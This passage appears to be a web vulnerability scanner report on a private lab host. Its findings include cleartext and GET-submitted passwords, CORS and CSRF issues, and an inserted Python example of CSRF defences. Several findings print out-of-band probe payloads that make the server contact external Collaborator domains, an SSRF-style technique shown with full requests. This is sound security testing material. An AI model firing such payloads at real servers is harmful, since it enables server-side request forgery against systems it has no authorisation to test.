Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
<div>
               <form method="post" enctype="multipart/form-data">
           <table>
...[SNIP]...
<td>
                       <input type="password" name="password" value="" />
                   </td>
...[SNIP]...
1.7.4. http://10.250.200.5:8080/

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page contains a form whose action URL is submitted over clear-text HTTP, and the form contains a password field. Both the form action and the password input are shown in the form markup in Response 1 below.

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<div class="panel-body">
<form action="/login" role="form">
<div class="form-group">
...[SNIP]...
<div class="form-group">
<input type="password" name="password" class="form-control" placeholder="Password" />
</div>
...[SNIP]...
1.8. External service interaction (DNS)

There are 2 instances of this issue:

Issue background

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

In cases where DNS-based interactions can be triggered, it is normally possible to trigger interactions using other service types, and these are reported as separate issues. If a payload that specifies a particular service type (e.g. a URL) triggers only a DNS-based interaction, then this strongly indicates that the application attempted to connect using that other service, but was prevented from doing so by egress filters in place at the network layer. The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Issue remediation

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.

1.8.1. http://10.250.200.5:81/contactus.php [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names.

The payload http://k4pc9d29ygecxg8bopcdxibmqdw5ytohf45su.burpcollaborator.net/?contact.txt was submitted in the f parameter.

The application performed a DNS lookup of the specified domain.

Request 1

GET /contactus.php?f=http%3a%2f%2fk4pc9d29ygecxg8bopcdxibmqdw5ytohf45su.burpcollaborator.net%2f%3fcontact.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:12 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1611
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type AAAA for the domain name k4pc9d29ygecxg8bopcdxibmqdw5ytohf45su.burpcollaborator.net.

The lookup was received from IP address 128.39.113.1 at 2017-nov-08 11:48:12 UTC.
1.8.2. http://10.250.200.5:81/sys-test.php [test parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys-test.php

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names.

The payload knbcsdl9hgxcggrb7pvdgium9df75vyjp6fu4.burpcollaborator.net was submitted in the test parameter.

The application performed a DNS lookup of the specified domain.

Request 1

GET /sys-test.php?test=knbcsdl9hgxcggrb7pvdgium9df75vyjp6fu4.burpcollaborator.net HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:02 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 66
Connection: close
Content-Type: text/html; charset=UTF-8

round-trip min/avg/max/stddev = 43.332/43.332/43.332/0.000 ms</br>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name knbcsdl9hgxcggrb7pvdgium9df75vyjp6fu4.burpcollaborator.net.

The lookup was received from IP address 128.39.113.1 at 2017-nov-08 11:56:02 UTC.
1.9. External service interaction (HTTP)

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains.

The payload http://d3h58612x9d5w974nib6wbafp6vyxmnaex4lt.burpcollaborator.net/?contact.txt was submitted in the f parameter.

The application performed an HTTP request to the specified domain.

Issue background

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Issue remediation

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.

Request 1

GET /contactus.php?f=http%3a%2f%2fd3h58612x9d5w974nib6wbafp6vyxmnaex4lt.burpcollaborator.net%2f%3fcontact.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:12 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1611
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 128.39.113.1 at 2017-nov-08 11:48:13 UTC.

Request to Collaborator

GET /?contact.txt HTTP/1.0
Host: d3h58612x9d5w974nib6wbafp6vyxmnaex4lt.burpcollaborator.net
Connection: close

Response from Collaborator

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 60

<html><body>kxtlooz8obw3n86ggdx6w7zjkugigjfigz</body></html>
2. Low severity issues
2.1. Password submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page contains a form that is submitted using the GET method, and the form contains a password field. The form (which sets no method attribute, so the browser defaults to GET) and the password input are shown in the form markup in Response 1 below.

Issue background

Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, applications should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<div class="panel-body">
<form action="/login" role="form">
<div class="form-group">
...[SNIP]...
<div class="form-group">
<input type="password" name="password" class="form-control" placeholder="Password" />
</div>
...[SNIP]...
2.2. Password field with autocomplete enabled

There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.



2.2.1. http://10.250.200.5/wp-login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The page contains a form with a password field on which autocomplete is enabled (no autocomplete="off" attribute is set on the form or the field). The form action and the password input are shown in the form markup in Response 1 below.

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
</h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
...[SNIP]...
2.2.2. http://10.250.200.5:81/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /login

Issue detail

The page contains a form with a password field on which autocomplete is enabled (no autocomplete="off" attribute is set on the form or the field). The form and the password input are shown in the form markup in Response 1 below.

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
<body>
<form method="post">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" value="Log in">
...[SNIP]...
2.2.3. http://10.250.200.5:81/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The page contains a form with a password field on which autocomplete is enabled (no autocomplete="off" attribute is set on the form or the field). The form and the password input are shown in the form markup in Response 1 below.

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
<div>
               <form method="post" enctype="multipart/form-data">
           <table>
...[SNIP]...
<td>
                       <input type="password" name="password" value="" />
                   </td>
...[SNIP]...
2.2.4. http://10.250.200.5:8080/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page contains a form with a password field on which autocomplete is enabled (no autocomplete="off" attribute is set on the form or the field). The form action and the password input are shown in the form markup in Response 1 below.

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<div class="panel-body">
<form action="/login" role="form">
<div class="form-group">
...[SNIP]...
<div class="form-group">
<input type="password" name="password" class="form-control" placeholder="Password" />
</div>
...[SNIP]...
2.3. Unencrypted communications

There are 4 instances of this issue:

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

2.3.1. http://10.250.200.5/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /
2.3.2. http://10.250.200.5:81/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /
2.3.3. http://10.250.200.5:8080/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /
2.3.4. http://detectportal.firefox.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://detectportal.firefox.com
Path:   /
3. Informational issues
3.1. Cross-origin resource sharing

There are 3 instances of this issue:

Issue background

An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially retrieve content from the application, and sometimes carry out actions within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by an attacker to exploit the trust relationship and attack the application that allows access. CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and security posture of any domains granted access.

Issue remediation

Any inappropriate domains should be removed from the CORS policy.

3.1.1. http://10.250.200.5/wp-admin/admin-ajax.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-admin/admin-ajax.php

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_baf0a32bf708ebfb24022d9545b279af=+; wordpress_sec_baf0a32bf708ebfb24022d9545b279af=+; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://10.250.200.5

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:46:24 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Access-Control-Allow-Origin: http://10.250.200.5
Access-Control-Allow-Credentials: true
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
3.1.2. http://10.250.200.5/wp-admin/admin-ajax.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-admin/admin-ajax.php/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /wp-admin/admin-ajax.php/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_baf0a32bf708ebfb24022d9545b279af=+; wordpress_sec_baf0a32bf708ebfb24022d9545b279af=+; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://10.250.200.5

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:01 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Access-Control-Allow-Origin: http://10.250.200.5
Access-Control-Allow-Credentials: true
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
3.1.3. http://10.250.200.5/wp-json/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-json/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /wp-json/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://10.250.200.5

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:54 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
X-Robots-Tag: noindex
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization
Allow: GET
Access-Control-Allow-Origin: http://10.250.200.5
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Credentials: true
Content-Length: 998
Connection: close
Content-Type: application/json; charset=UTF-8

{"name":"Fairweather & sons","description":"Just another WordPress site","url":"http:\/\/10.250.200.5","home":"http:\/\/10.250.200.5","namespaces":["oembed\/1.0"],"authentication":[],"routes":{"\/":{"
...[SNIP]...
3.2. Cross-site request forgery

There are 3 instances of this issue:

Issue background

Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

Issue remediation

The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an attacker to determine or predict the value of any token that was issued to another user. The token should be associated with the user's session, and the application should validate that the correct token is received before performing any action resulting from the request.

An alternative approach, which may be easier to implement, is to validate that Host and Referer headers in relevant requests are both present and contain the same domain name. However, this approach is somewhat less robust: historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate these headers to bypass such defenses.
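The following is an added example, not code from the Burp report or from WordPress. It implements the two defenses described above: a session-bound token generated from the OS CSPRNG and compared in constant time, and the weaker Host/Referer comparison, parsed properly rather than by substring. The form field name _csrf, the session dict and the handler around the lostpassword form are assumptions made for illustration.

```python
"""Added example (not from the Burp report or WordPress): the session-bound
CSRF token and the weaker Host/Referer check, as described in the remediation
text. The _csrf field name and the session dict are assumptions."""
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

TOKEN_BYTES = 32  # 256 bits from the OS CSPRNG via the secrets module


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Mint a fresh unpredictable token and bind it to this user's session."""
    token = secrets.token_urlsafe(TOKEN_BYTES)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: Dict[str, str], submitted: Optional[str]) -> bool:
    """Constant-time comparison against the token bound to the session.
    A session without a token, or a form without one, never passes."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def lostpassword_allowed(session: Dict[str, str], body: str) -> bool:
    """Gate for a form like POST /wp-login.php?action=lostpassword: the cookie
    alone identifies the user, so the hidden _csrf field decides."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return csrf_token_valid(session, form.get("_csrf"))


def referer_matches_host(host_header: Optional[str], referer: Optional[str]) -> bool:
    """The weaker alternative: both headers present and naming the same host.
    Hostnames are extracted with urlsplit rather than a substring test, so a
    Referer of http://10.250.200.5.attacker.example/ does not pass for
    10.250.200.5, and an absent or malformed Referer is rejected."""
    if not host_header or not referer:
        return False
    host = urlsplit("//" + host_header).hostname   # drops any :port suffix
    ref_host = urlsplit(referer).hostname
    return host is not None and ref_host is not None and host == ref_host


if __name__ == "__main__":
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    body = ("user_login=555-555-0199@example.com&wp-submit=Get+New+Password"
            "&redirect_to=&_csrf=" + token)
    print("token present:", lostpassword_allowed(session, body))
    print("token missing:", lostpassword_allowed(session, body.rsplit("&", 1)[0]))
    print("same-host referer:", referer_matches_host(
        "10.250.200.5", "http://10.250.200.5/wp-login.php?action=lostpassword"))
    print("foreign referer:", referer_matches_host(
        "10.250.200.5", "http://HSrfGgeH.com/wp-login.php?action=lostpassword"))
```

The two Referer values in the requests below (the real one and the scanner's substituted one) are exactly the pair this check must tell apart; note that it returns False when the Referer is absent, which is the case the caveat about browsers and plugins is pointing at, since a stripped header would otherwise have to be treated as trusted.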

3.2.1. http://10.250.200.5/wp-login.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/wp-login.php?action=lostpassword
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
